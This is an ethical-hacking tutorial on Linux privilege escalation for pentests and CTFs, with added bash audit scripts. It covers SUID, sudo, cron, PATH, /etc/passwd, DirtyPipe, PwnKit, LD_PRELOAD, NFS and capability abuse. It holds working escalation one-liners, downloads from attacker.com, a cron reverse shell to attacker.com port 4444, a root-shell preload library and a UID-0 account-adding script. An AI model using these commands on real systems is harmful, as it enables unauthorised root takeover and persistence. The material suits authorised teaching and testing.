Ethical Hacking #privilege-escalation #linux #pentesting

Linux Privilege Escalation Techniques and Tools

Learn the essential Linux privilege escalation techniques used in CTFs and real pentests — SUID, sudo misconfigs, cron jobs, writable paths, and more.


Privilege escalation is the phase of a penetration test that follows initial access. You’ve landed a shell as a low-privileged user — now the objective is to become root. Linux systems offer a rich attack surface for this because of the complexity of file permissions, scheduled tasks, running services, and the many ways administrators misconfigure systems over time.

This guide covers the most productive techniques, the tools that automate enumeration, and the manual checks every pentester should know.

Automated Enumeration Tools

Before diving into manual techniques, run an automated script to surface obvious issues quickly, then verify anything interesting by hand: these scripts are noisy and report plenty of findings that turn out not to be exploitable.

LinPEAS

LinPEAS (Linux Privilege Escalation Awesome Script), from the PEASS-ng project, is the de facto standard. It checks hundreds of privilege escalation vectors and colour-codes findings by how likely they are to lead to root; read the output rather than trusting the colours alone:

# Needs outbound HTTPS from the target; on a real engagement download, inspect and hash the script before piping it to sh
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Or transfer it to the target and run it:

wget http://attacker.com/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh | tee /tmp/linpeas_output.txt

LinEnum

An older script that is still useful; -t runs the thorough (slower) set of checks:

wget http://attacker.com/LinEnum.sh -O /tmp/linenum.sh
chmod +x /tmp/linenum.sh
/tmp/linenum.sh -t

linux-exploit-suggester

Matches the reported kernel version against a list of public exploits. It goes by version string only, so a distribution kernel that has backported the fix can still be listed; treat its output as leads to verify, not as results:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh

SUID / SGID Binaries

A SUID binary runs with its owner's user ID as the effective UID (for SGID, the owning group's GID), whatever the real UID of the user who executed it. When the owner is root, any way of making the program execute something of your choosing is a root shell, which is why misconfigured or custom SUID binaries are one of the most common escalation paths. The real UID stays yours, though: bash and recent dash reset the effective UID to the real one on startup unless told not to, hence the -p flag in the examples below.

Find SUID Binaries

find / -perm -4000 -type f 2>/dev/null

Find SGID Binaries

find / -perm -2000 -type f 2>/dev/null

Compare the list against a stock install of the same distribution. Anything custom, anything outside the usual /usr/bin and /usr/sbin locations, and anything listed on GTFOBins (https://gtfobins.github.io/), the curated index of binaries that can be abused for file reads, file writes and shells when they carry SUID or run under sudo, deserves a closer look.
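As an added example, not from the original page: a small bash triage that runs the two find commands above in one pass, drops the binaries a stock install ships with SUID/SGID, and marks the rest as either having a known GTFOBins entry or needing manual review. The BASELINE and GTFO_KNOWN lists are hand-picked and partial (assumptions, not the full GTFOBins index), so tune them for the distribution you are on.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): enumerate SUID/SGID files under a
# directory and triage them. BASELINE and GTFO_KNOWN are hand-picked, partial
# lists (assumptions, not authoritative); adjust BASELINE to the distro at hand.

BASELINE="passwd sudo su mount umount chsh chfn newgrp gpasswd fusermount3 ssh-keysign"
GTFO_KNOWN="bash sh dash find vim vi env python python3 perl php ruby node nmap awk gawk cp mv tee less more tar xxd base64 dd"

# in_list WORD "w1 w2 ..." -> 0 if WORD is one of the space-separated words
in_list() {
    case " $2 " in *" $1 "*) return 0 ;; esac
    return 1
}

# list_setid_files ROOT -> every regular file under ROOT with the SUID or SGID bit, sorted
list_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# triage_setid ROOT -> one line per file that is not in BASELINE:
#   "GTFOBINS <owner> <path>" when the name has a known GTFOBins SUID entry
#   "REVIEW <owner> <path>"   for anything else (custom tools deserve a look)
triage_setid() {
    local f name owner
    list_setid_files "$1" | while IFS= read -r f; do
        name=${f##*/}
        owner=$(ls -ld "$f" | awk '{print $3}')
        if in_list "$name" "$BASELINE"; then
            continue
        elif in_list "$name" "$GTFO_KNOWN"; then
            printf 'GTFOBINS %s %s\n' "$owner" "$f"
        else
            printf 'REVIEW %s %s\n' "$owner" "$f"
        fi
    done
    return 0
}

# On a real host: triage_setid /
```

Run triage_setid / on the target. A REVIEW hit owned by root is a custom binary worth reversing or at least running under strace; GTFOBINS hits go straight to the site's SUID recipes.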

Common SUID Escalations

bash with SUID set:

bash -p
# -p prevents bash from dropping SUID privileges

find with SUID set (the -p stops the spawned shell from dropping the effective UID):

find . -exec /bin/sh -p \; -quit

vim with SUID set. vim's :! escape hands your command to a shell, and that shell resets the effective UID to your real one on startup (bash and recent dash both do this), so the ':!/bin/sh' trick that works under sudo (below) does not help here. GTFOBins' SUID entry uses vim's embedded Python instead, which execs a shell with -p directly; it requires a vim built with Python support:

vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

Sudo Misconfigurations

The sudo configuration is one of the first things to check.

sudo -l

This lists the commands the current user may run through sudo, as root or as another user, and whether a password is required (NOPASSWD). Read the Defaults line as well: env_keep entries such as LD_PRELOAD (see the environment section below) and a missing secure_path are findings in their own right.

Common Sudo Escalations

If a user can run vim as root:

sudo vim -c ':!/bin/bash'

If a user can run python3 as root:

sudo python3 -c 'import os; os.system("/bin/bash")'

If the sudoers entry uses a wildcard or places no restriction on arguments, the "allowed" command can be steered into running something else:

# If rule is: user ALL=(ALL) NOPASSWD: /usr/bin/find *
# The trailing * matches any arguments, so -exec is allowed too
sudo find /etc/passwd -exec /bin/sh \; -quit

Wildcard abuse and argument injection into sudo rules are covered extensively on GTFOBins.
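Added example, not part of the original page: a bash function that reads sudo -l output and flags the things discussed above, NOPASSWD, wildcards in the arguments, GTFOBins binaries, an unrestricted ALL, and env_keep entries for LD_PRELOAD or LD_LIBRARY_PATH (the precondition for the LD_PRELOAD technique further down this page). The sample output for a user alice on web01 is constructed, and GTFO_SUDO is a hand-picked subset of the GTFOBins sudo entries (an assumption).

```bash
#!/usr/bin/env bash
# Added example (not from the original page): triage the text of `sudo -l`.
# GTFO_SUDO is a hand-picked subset of binaries with a GTFOBins sudo entry (an
# assumption, not the full index); the sample output below is constructed.

GTFO_SUDO="vim vi find python python3 perl less more man awk env bash sh tar zip nmap git ftp"

# in_list WORD "w1 w2 ..." -> 0 if WORD is one of the words
in_list() {
    case " $2 " in *" $1 "*) return 0 ;; esac
    return 1
}

# sudo_l_triage: reads `sudo -l` output on stdin, prints one finding per line
#   ENV_KEEP <defaults line>   a loader variable survives env_reset (LD_PRELOAD abuse)
#   ALL <rule>                 the user may run any command
#   RULE <flags>: <command>    NOPASSWD, SETENV, WILDCARD in the arguments, GTFOBINS binary
sudo_l_triage() {
    local line rest tag flags name
    while IFS= read -r line; do
        line=${line#"${line%%[! ]*}"}                  # strip leading blanks
        case $line in
            *env_keep*LD_PRELOAD*|*env_keep*LD_LIBRARY_PATH*)
                printf 'ENV_KEEP %s\n' "$line" ;;
            \(*)                                        # "(runas) [TAG: ...] command args"
                rest=${line#*\)}
                rest=${rest#"${rest%%[! ]*}"}
                flags=""
                while case $rest in [A-Z]*:*) true ;; *) false ;; esac; do   # peel off TAG: prefixes
                    tag=${rest%%:*}; rest=${rest#*:}; rest=${rest#"${rest%%[! ]*}"}
                    case $tag in NOPASSWD|SETENV) flags="$flags $tag" ;; esac
                done
                if [ "$rest" = ALL ]; then printf 'ALL %s\n' "$line"; continue; fi
                case $rest in *\**) flags="$flags WILDCARD" ;; esac
                name=${rest%% *}; name=${name##*/}
                in_list "$name" "$GTFO_SUDO" && flags="$flags GTFOBINS"
                [ -n "$flags" ] && printf 'RULE%s: %s\n' "$flags" "$rest" ;;
        esac
    done
    return 0
}

# Constructed sample of `sudo -l` output for a fictional user alice
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/find *
    (root) /usr/bin/vim
    (ALL : ALL) /usr/sbin/service apache2 restart
EOF
}

# On a real host: sudo -l | sudo_l_triage
sample_sudo_l | sudo_l_triage
```

On the sample the function reports the env_keep line, the NOPASSWD find rule (wildcard plus GTFOBins hit) and the vim rule; the service rule gets no flags and is silently skipped, which is the right default for a triage, not proof that it is safe.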

Cron Jobs

Cron jobs that run as root and execute a script you can modify (or that sits in a directory you can write to, so the file can be replaced) are a classic escalation path. System jobs live in /etc/crontab, /etc/cron.d and the /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly directories; on modern systems check systemd timers as well, which serve the same purpose.

cat /etc/crontab
cat /etc/cron.d/*
ls -la /var/spool/cron/crontabs/

Cron logs show which jobs actually fire, and how often:

grep cron /var/log/syslog
cat /var/log/cron.log

If a cron job calls a script you can write to, start a listener on the attacker machine (port 4444 here) and put a reverse shell in the script. printf is used rather than echo because not every shell's echo expands \n:

printf '#!/bin/bash\nbash -i >& /dev/tcp/attacker.com/4444 0>&1\n' > /path/to/script.sh
chmod +x /path/to/script.sh

Wait for the cron job to fire and catch the reverse shell. Overwriting the script stops it doing whatever it was doing, which an administrator may notice; appending the payload line to the existing script keeps the job working. The /dev/tcp redirection is a bash feature, hence the #!/bin/bash line.

Writable PATH and Script Hijacking

If a root-owned script or cron job calls a binary by bare name (no full path) and the PATH that process resolves names through contains a directory you can write to, ahead of the directory that holds the real binary, you can plant a replacement. The PATH that matters is the one the root process uses, not your login shell's: for /etc/crontab it is the PATH= line at the top of that file (cron's own default is /usr/bin:/bin), for sudo it is secure_path if sudoers sets it, otherwise your PATH passes through. Changing PATH in your own shell only affects commands you run yourself.

# Check the PATH the root job will actually search
grep PATH /etc/crontab

# Plant a replacement in a writable directory that appears early in that PATH (/tmp is assumed here);
# a script that leaves a SUID copy of bash is more useful than an interactive shell a cron job cannot attach to
cat > /tmp/service <<'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash
EOF
chmod +x /tmp/service

# When the root process next calls "service", it runs /tmp/service; afterwards:
/tmp/rootbash -p
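Added example covering both the cron section and the PATH section, not from the original page: a bash audit of a system crontab (the format with a user field, as in /etc/crontab and /etc/cron.d) that reports jobs whose program file we can write, and jobs that name their program without a path where a directory we can write to is searched before the real one. Writability is decided with test -w as the current user, which is exactly the check that matters. The cron default PATH constant is the Vixie/ISC default and is an assumption; the file names in the usage comment are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): audit a crontab for the two conditions
# above, a job whose program is writable by the current user and a job that names its
# program without a path so that a writable PATH directory can shadow it. The PATH
# default below is the Vixie/ISC cron default for /etc/crontab and is an assumption.

CRON_DEFAULT_PATH="/usr/bin:/bin"

# path_lookup CMD PATHLIST -> walks PATHLIST in order and prints
#   "FOUND <dir>/<cmd>"  when the real program is reached first
#   "HIJACK <dir>"       when a writable directory comes before it
path_lookup() {
    local cmd=$1 dirs=$2 d
    while [ -n "$dirs" ]; do
        d=${dirs%%:*}
        if [ "$d" = "$dirs" ]; then dirs=""; else dirs=${dirs#*:}; fi
        [ -n "$d" ] || continue
        if [ -x "$d/$cmd" ]; then printf 'FOUND %s\n' "$d/$cmd"; return 0; fi
        if [ -w "$d" ]; then printf 'HIJACK %s\n' "$d"; return 0; fi
    done
    return 0
}

# audit_crontab FILE -> one finding per line:
#   "WRITABLE <user> <program>"      the program file can be modified by us
#   "HIJACK <user> <cmd> via <dir>"  a writable PATH dir is searched before the real cmd
#   "REVIEW <user> <cmd>"            relative path with a slash, resolved against the job's cwd
audit_crontab() {
    local file=$1 cron_path=$CRON_DEFAULT_PATH line user cmd res prog
    set -f                                    # schedule fields contain '*'; never glob them
    while IFS= read -r line; do
        case $line in
            ''|\#*)        continue ;;
            PATH=*)        cron_path=${line#PATH=}; cron_path=${cron_path#\"}; cron_path=${cron_path%\"}; continue ;;
            [A-Za-z_]*=*)  continue ;;        # SHELL=, MAILTO= and other variables
            @*)            set -- $line; user=$2; cmd=$3 ;;                          # @reboot, @daily ...
            *)             set -- $line; [ $# -ge 7 ] || continue; user=$6; cmd=$7 ;;
        esac
        [ -n "$cmd" ] || continue
        case $cmd in
            /*)  [ -w "$cmd" ] && printf 'WRITABLE %s %s\n' "$user" "$cmd" ;;
            */*) printf 'REVIEW %s %s\n' "$user" "$cmd" ;;
            *)   res=$(path_lookup "$cmd" "$cron_path")
                 case $res in
                     "HIJACK "*) printf 'HIJACK %s %s via %s\n' "$user" "$cmd" "${res#HIJACK }" ;;
                     "FOUND "*)  prog=${res#FOUND }
                                 [ -w "$prog" ] && printf 'WRITABLE %s %s\n' "$user" "$prog" ;;
                 esac ;;
        esac
    done < "$file"
    set +f
    return 0
}

# On a real host: audit_crontab /etc/crontab; for f in /etc/cron.d/*; do audit_crontab "$f"; done
```

A WRITABLE hit on a root job is the cron technique above; a HIJACK hit is the PATH technique, and the directory it names is where the replacement goes. Per-user crontabs (crontab -l) have no user field and would need the field off-by-one adjusted.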

World-Writable Files and Directories

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
find / -writable -type d -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null

Key targets:

  • /etc/passwd: if writable, add a new root user (next section)
  • /etc/shadow: if readable, take the hashes offline to crack; if writable, replace root's hash
  • /etc/sudoers and /etc/sudoers.d/: if writable, give yourself full sudo
  • Script files called by root processes (cron jobs, PATH lookups, service units)

Adding a Root User via /etc/passwd

If /etc/passwd is writable, append a second UID-0 account. The hash can go straight into the password field: the shadow file is only consulted when that field contains x.

# Generate a password hash
openssl passwd -1 -salt hacker password123
# Output: $1$hacker$hashed...

# Append a new root-level user (UID 0, GID 0) and switch to it with the password chosen above
echo 'hacker:$1$hacker$hashed...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
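Added example, not from the original page: the /etc/passwd append above with the checks a bare echo skips, a username and hash that cannot break the field layout, a backup, a duplicate check, and a parse check that restores the backup if the file no longer has seven fields on every line. The backup location and the hacker/hash values in the usage comment are assumptions; the test works on a constructed copy of a passwd file.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): append a UID-0 entry to a passwd
# file with the checks a bare `echo >>` skips. FILE is /etc/passwd on a real target;
# the test works on a constructed copy. HASH is whatever `openssl passwd -1`
# printed for the password you chose.

# passwd_entry NAME HASH -> prints a well-formed passwd line, or fails
passwd_entry() {
    local name=$1 hash=$2
    case $name in ''|*[!a-z0-9_-]*) echo "bad username: $name" >&2; return 1 ;; esac
    case $hash in ''|*:*|*$'\n'*) echo "hash must be non-empty with no ':' or newline" >&2; return 1 ;; esac
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$name" "$hash" "$name"
}

# passwd_file_ok FILE -> 0 when every line has exactly 7 colon-separated fields
passwd_file_ok() {
    awk -F: 'NF != 7 { bad = 1 } END { exit bad }' "$1"
}

# add_root_user FILE NAME HASH [BACKUP] -> back FILE up, append the entry, and put the
# backup back if the result does not parse (the default backup path is an assumption)
add_root_user() {
    local file=$1 name=$2 hash=$3 backup=${4:-/tmp/passwd.bak} entry
    [ -w "$file" ] || { echo "$file is not writable" >&2; return 1; }
    entry=$(passwd_entry "$name" "$hash") || return 1
    grep -q "^$name:" "$file" && { echo "$name already exists in $file" >&2; return 1; }
    cp -p "$file" "$backup" || return 1
    printf '%s\n' "$entry" >> "$file"
    if passwd_file_ok "$file"; then
        echo "added $name (UID 0); log in with: su $name"
    else
        cp -p "$backup" "$file"
        echo "$file did not parse after the append; restored from $backup" >&2
        return 1
    fi
}

# On a real target:
#   add_root_user /etc/passwd hacker "$(openssl passwd -1 -salt hacker password123)"
```

The duplicate check matters because a second entry with an existing name is ignored by most lookups and only draws attention; the parse check matters because a malformed /etc/passwd can lock everyone, including you, out of the box.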

Kernel Exploits

Kernel exploits are the last resort: they are version-specific, a failed attempt can crash the machine, and on a real engagement that needs sign-off first. Start by identifying exactly what is running:

uname -r
cat /etc/os-release

Search for known exploits:

  • Exploit-DB
  • linux-exploit-suggester output
  • CVE databases for the specific kernel version

DirtyPipe (CVE-2022-0847)

A bug in the kernel's pipe and splice code, introduced in 5.8 and fixed in 5.16.11, 5.15.25 and 5.10.102 (the 5.9 and 5.11 to 5.14 stable branches had reached end of life and never got the fix). An unprivileged user can overwrite bytes in the page cache of any file they can open for reading, including root-owned ones. The original proof of concept takes a target file, an offset and the data to write:

# Compile and run the DirtyPipe PoC (usage: TARGETFILE OFFSET DATA)
gcc dirtypipe.c -o dirtypipe
./dirtypipe /etc/passwd 1 "hacker::0:0:hacker:/root:/bin/bash"

Three things to know before running it. DATA overwrites bytes in place starting at OFFSET; it does not insert a line, so as written the string lands on root's own entry and spills into the next one, and in practice you size DATA to the bytes it replaces and keep a copy of the original file. The write cannot start on a page boundary, which is why offset 1 rather than 0 is used. And the modified page is never written back to disk, so the change disappears once the page is evicted; switch to the new account straight away.
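Added example, not from the original page: a bash function that tells whether an upstream kernel version string (uname -r style) falls in the affected range described above. It encodes the three fixed stable releases; a match only says "worth checking", since distribution kernels backport the fix without changing the base version, and the usage line is an assumption about how you would wire it into enumeration.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): decide whether a kernel version string
# falls in the CVE-2022-0847 window (5.8 up to the fixes in 5.16.11, 5.15.25, 5.10.102).
# A match is a hint only: distribution kernels keep their base version and backport
# fixes, so confirm against the distro changelog or test the PoC in a lab first.

# kernel_in_dirtypipe_range VERSION -> 0 when upstream VERSION carries the bug
kernel_in_dirtypipe_range() {
    local v=${1%%-*} major minor patch          # "5.15.0-91-generic" -> "5.15.0"
    set -- $(printf '%s\n' "$v" | tr '.' ' ')
    major=${1:-x} minor=${2:-0} patch=${3:-0}
    case "$major$minor$patch" in *[!0-9]*) return 1 ;; esac   # unparsable: report not vulnerable
    [ "$major" -eq 5 ] || return 1              # nothing before 5.8; 5.17 was released with the fix
    [ "$minor" -ge 8 ] && [ "$minor" -le 16 ] || return 1
    case $minor in
        16) [ "$patch" -lt 11 ] ;;              # fixed in 5.16.11
        15) [ "$patch" -lt 25 ] ;;              # fixed in 5.15.25
        10) [ "$patch" -lt 102 ] ;;             # fixed in 5.10.102
        *)  return 0 ;;                         # 5.8, 5.9, 5.11..5.14: branches that never got a fix
    esac
}

# On the target:
#   kernel_in_dirtypipe_range "$(uname -r)" && echo "in the DirtyPipe window, check for a backport"
```

A 5.15.0-91-generic style string reports as in range because only the upstream base version is compared; that is the false positive the caveat is about, and the distro's changelog or a test in a lab settles it.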

PwnKit (CVE-2021-4034)

A local privilege escalation in pkexec (part of Polkit): an out-of-bounds write triggered by invoking pkexec with an empty argument list, present since pkexec's first release in 2009 and fixed in January 2022, so it affected essentially every major distribution with Polkit installed. The berdav repository builds a working PoC:

git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
make
./cve-2021-4034

Environment Variable Abuse

LD_PRELOAD

If sudo -l shows env_keep+=LD_PRELOAD in its Defaults line, the variable survives sudo's environment reset and the dynamic loader honours it for whatever command the rule lets you run. That command runs as root but is not itself setuid, so the loader has no reason to ignore LD_PRELOAD. Build a shared library whose initialiser drops the variable (so the shell it spawns does not load the library again) and starts a root shell:

// shell.c: with -nostartfiles below, this _init runs before the target program's main()
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");   // do not preload ourselves into the shell we start
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

# Compile without the default startup files so the _init above is the one that runs, then
# run a command the sudo rule permits (find here) with the library preloaded
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/find

NFS Root Squash Misconfiguration

If an export on the target is configured with no_root_squash, requests arriving as UID 0 from a client are not remapped to nobody, so root on your own machine can write root-owned files, including SUID binaries, straight onto the share. Check /etc/exports on the target if it is readable, and list exports from the attacker side with showmount. Two caveats: a bash copied from the attacker box may not run against the target's libc, so copy the target's own bash onto the share first; and the SUID bit is ignored if the exported directory lives on a filesystem the target mounts with nosuid.

# On the target: put a copy of the target's own bash in the exported directory
cp /bin/bash /share/bash

# On the attacker machine, as root: mount the share and make that copy SUID root
showmount -e target_ip
mount -o rw,vers=2 target_ip:/share /mnt/nfs   # drop vers=2 (or use vers=3) if the server refuses NFSv2
chown root:root /mnt/nfs/bash
chmod +s /mnt/nfs/bash

# Back on the target
/share/bash -p
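Added example, not from the original page: a bash function that reads an exports file and prints every client entry carrying no_root_squash, so the check can be made from the target side before touching the share. The sample /etc/exports is constructed and not from any real host.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): find exports that disable root squashing.
# On the target read /etc/exports (and /etc/exports.d/*); the sample here is constructed.

# exports_no_root_squash [FILE] -> prints "<share> <client> <options>" for every
# client entry whose option list contains no_root_squash (reads stdin when no FILE)
exports_no_root_squash() {
    local file=${1:-/dev/stdin} line share spec client opts
    while IFS= read -r line; do
        line=${line%%#*}                          # strip comments
        set -f; set -- $line; set +f              # split on whitespace without globbing "*"
        [ $# -ge 2 ] || continue                  # need a share and at least one client spec
        share=$1; shift
        for spec; do
            client=${spec%%\(*}                   # "10.0.0.0/24(rw,sync)" -> "10.0.0.0/24"
            case $spec in
                *\(*\)) opts=${spec#*\(}; opts=${opts%\)} ;;
                *)      opts="" ;;                # no option list: exportfs defaults apply (root_squash on)
            esac
            case ",$opts," in
                *,no_root_squash,*) printf '%s %s %s\n' "$share" "$client" "$opts" ;;
            esac
        done
    done < "$file"
    return 0
}

# Constructed /etc/exports for the test; not from any real host
sample_exports() {
    cat <<'EOF'
# /etc/exports: the access control list for filesystems which may be exported
/srv/share   10.0.0.0/24(rw,sync,no_root_squash) *(ro)
/home        192.168.1.0/24(rw,sync)
/tmp/export  *(rw,no_subtree_check,no_root_squash)
EOF
}

# On the target: exports_no_root_squash /etc/exports
sample_exports | exports_no_root_squash
```

Note that the client column matters: an export that is no_root_squash only for one subnet is exploitable only from an address in that subnet, so pivoting may be needed before the mount step above.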

Capabilities

Linux capabilities split root's privileges into separate units that can be attached to a binary as file capabilities, so a program can, say, change its UID or read any file without being SUID root. Check for binaries that carry one of the dangerous ones (cap_setuid, cap_setgid, cap_dac_override, cap_dac_read_search, cap_sys_admin and cap_sys_ptrace among others):

getcap -r / 2>/dev/null

If python3 carries cap_setuid (newer libcap prints it as cap_setuid=ep), setuid(0) succeeds inside the interpreter and the shell it then starts is root:

# /usr/bin/python3 = cap_setuid+eip
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
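Added example, not from the original page: a triage of getcap -r / output that flags the capabilities worth chasing, in both the older path = cap+flags format shown above and the newer path cap=flags one. DANGEROUS_CAPS is a hand-picked list (an assumption) and the sample output is constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): triage `getcap -r /` output.
# DANGEROUS_CAPS is a hand-picked list (an assumption): each lets a process read or
# write files it does not own, change its UID/GID, or reach kernel-level functionality.

DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_chown cap_fowner cap_sys_admin cap_sys_ptrace cap_sys_module"

# getcap_triage: reads getcap output on stdin, prints "<path> <cap> <flags>" per hit.
# Handles both "path = cap_a,cap_b+eip" (older libcap) and "path cap_a,cap_b=eip"
# (libcap 2.41 and later); paths containing spaces are not handled.
getcap_triage() {
    local line path caps flags c
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        case $line in
            *" = "*) path=${line%%" = "*}; caps=${line#*" = "} ;;
            *)       path=${line%% *};     caps=${line#* } ;;
        esac
        flags=${caps##*[=+]}                   # "cap_setuid=ep" -> "ep"
        caps=${caps%[=+]*}                     # "cap_setuid=ep" -> "cap_setuid"
        for c in $(printf '%s\n' "$caps" | tr ',' ' '); do
            case " $DANGEROUS_CAPS " in
                *" $c "*) printf '%s %s %s\n' "$path" "$c" "$flags" ;;
            esac
        done
    done
    return 0
}

# Constructed getcap output mixing both formats; not from a real host
sample_getcap() {
    cat <<'EOF'
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3 cap_setuid=ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/local/bin/backup_tool = cap_dac_read_search+ep
EOF
}

# On a real host: getcap -r / 2>/dev/null | getcap_triage
sample_getcap | getcap_triage
```

The flags are printed rather than filtered on: a capability that is only permitted (p) and not effective (e) is still usable by a program that raises it itself, so a "+p" hit on an interpreter deserves the same attention as "+ep".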

Quick Checklist

When you land on a new Linux system:

  1. whoami && id && hostname — confirm your context
  2. sudo -l — check sudo permissions
  3. find / -perm -4000 2>/dev/null — SUID binaries
  4. cat /etc/crontab — scheduled tasks
  5. ps aux | grep root — running services
  6. cat /etc/passwd — user accounts
  7. Run LinPEAS for comprehensive coverage

Summary

Linux privilege escalation rarely requires finding a zero-day. Most real-world escalations exploit misconfigurations — a SUID binary on GTFOBins, a world-writable cron script, or an overly permissive sudoers rule. Automated tools like LinPEAS surface these quickly, but the ability to understand and manually verify findings is what separates skilled pentesters from those who just run scripts.

#ctf #post-exploitation #pentesting #linux #privilege-escalation